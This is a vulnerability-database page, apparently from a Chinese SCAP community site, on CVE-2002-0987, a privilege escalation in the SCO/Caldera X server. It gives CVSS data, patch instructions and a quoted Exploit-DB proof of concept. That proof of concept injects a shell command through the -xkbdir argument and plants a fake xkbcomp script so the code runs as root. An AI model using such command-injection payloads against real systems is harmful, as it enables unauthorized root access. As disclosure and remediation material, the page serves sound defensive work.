CVE-2002-0987
CVSS7.2
发布时间 :2002-09-24 00:00:00
修订时间 :2008-09-10 15:13:29
NMCOE    

[原文]X server (Xsco) in OpenUNIX 8.0.0 and UnixWare 7.1.1 does not drop privileges before calling programs such as xkbcomp using popen, which could allow local users to gain privileges.


[CNNVD]Open UNIX 8.0.0 UnixWare 7.1.1 X Server不安全调用popen漏洞(CNNVD-200209-066)

        
        UnixWare/Open UNIX是由Caldera公司分发和维护的商业UNIX操作系统。
        UnixWare/Open UNIX中的X Server调用了不安全的系统函数,本地攻击者可以利用这个漏洞以X Server进程权限在系统上执行任意命令。
        根据报告,UnixWare/Open UNIX中的X Server在调用使用了不安全系统函数popen()的xkbcomp前没有丢弃特殊权限,攻击者可以提交包含元字符的任意系统命令,使得任意命令以X Server进程权限执行,造成权限提升。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:caldera:unixware:7.1.1
cpe:/o:caldera:openunix:8.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0987
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0987
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-066
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5575
(UNKNOWN)  BID  5575
http://www.osvdb.org/5044
(UNKNOWN)  OSVDB  5044
http://www.iss.net/security_center/static/9976.php
(UNKNOWN)  XF  openunix-unixware-xsco-privileges(9976)
ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.38
(UNKNOWN)  CALDERA  CSSA-2002-SCO.38

- 漏洞信息

Open UNIX 8.0.0 UnixWare 7.1.1 X Server不安全调用popen漏洞
高危 输入验证
2002-09-24 00:00:00 2005-05-02 00:00:00
本地  
        
        UnixWare/Open UNIX是由Caldera公司分发和维护的商业UNIX操作系统。
        UnixWare/Open UNIX中的X Server调用了不安全的系统函数,本地攻击者可以利用这个漏洞以X Server进程权限在系统上执行任意命令。
        根据报告,UnixWare/Open UNIX中的X Server在调用使用了不安全系统函数popen()的xkbcomp前没有丢弃特殊权限,攻击者可以提交包含元字符的任意系统命令,使得任意命令以X Server进程权限执行,造成权限提升。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 加强本地用户管理。建议尽快打上补丁。
        厂商补丁:
        Caldera
        -------
        Caldera已经为此发布了一个安全公告(CSSA-2002-SCO.38)以及相应补丁:
        CSSA-2002-SCO.38:Open UNIX 8.0.0 UnixWare 7.1.1 : X server insecure popen and buffer overflow
        链接:ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.38
        补丁下载:
        -Open UNIX 8.0.0
         1,从如下地址下载补丁:
        
         ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.38
        
         2,使用MD5进行校验:
        
         MD5 (erg711819b.pkg.Z) = 8c06d16b46b7895c545bcdb7c23475d0
        
         MD5工具可以从如下地址下载:
        
         ftp://ftp.sco.com/pub/security/tools
         3,安装补丁程序:
        
         下载erg711819b.pkg.Z到/var/spool/pkg目录,执行如下操作:
        
         # uncompress /var/spool/pkg/erg711819b.pkg.Z
         # pkgadd -d /var/spool/pkg/erg711819b.pkg
        -UnixWare 7.1.1
         1,从如下地址下载补丁:
        
         ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.38
        
         2,使用MD5进行校验:
        
         MD5 (erg711819b.pkg.Z) = 8c06d16b46b7895c545bcdb7c23475d0
        
         MD5工具可以从如下地址下载:
        
         ftp://ftp.sco.com/pub/security/tools
         3,安装补丁程序:
        
         下载erg711819b.pkg.Z到/var/spool/pkg目录,执行如下操作:
        
         # uncompress /var/spool/pkg/erg711819b.pkg.Z
         # pkgadd -d /var/spool/pkg/erg711819b.pkg

- 漏洞信息 (21758)

Caldera X Server 7.1/8.0 External Program Privileged Invocation Weakness (EDBID:21758)
unix local
2002-08-27 Verified
0 Olaf Kirch
N/A [点击下载]
source: http://www.securityfocus.com/bid/5575/info

Caldera's X Server implementation invokes external commands without dropping existing privilege levels. Xserver calls xkbcomp, and other related utilities, in an unsecure manner using the popen() or system() calls. While this would not typically be an issue, as execution of the binary would typically result in the execution of code in the security context of the invoking user, the xkbcomp utility is executed by the Xserver process before privileges are dropped.

This weakness can be exploited by local attacker to execute arbitrary commands with elevated privileges. 

$ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

$ cat > /tmp/xkbcomp
#!/bin/sh
id > /tmp/I_WAS_HERE
[ctrl+d]
$ chmod a+x /tmp/xkbcomp
$ Xserver -xkbdir /tmp
[X server executes /tmp/xkbcomp] 		

- 漏洞信息

5044
OpenUNIX Xsco xkbcomp Unspecified Privilege Escalation
Local Access Required Input Manipulation, Other
Loss of Integrity
Exploit Public

- 漏洞描述

SCO OpenUnix and UnixWare contain a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when SCO Xserver (Xsco) fails to properly drop privileges when invoking external commands. This flaw may lead to a loss of integrity.

- 时间线

2002-08-27 Unknow
1998-02-03 Unknow

- 解决方案

Apply SCO hotfixes described in security advisory CSSA-2002-SCO.38 , as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站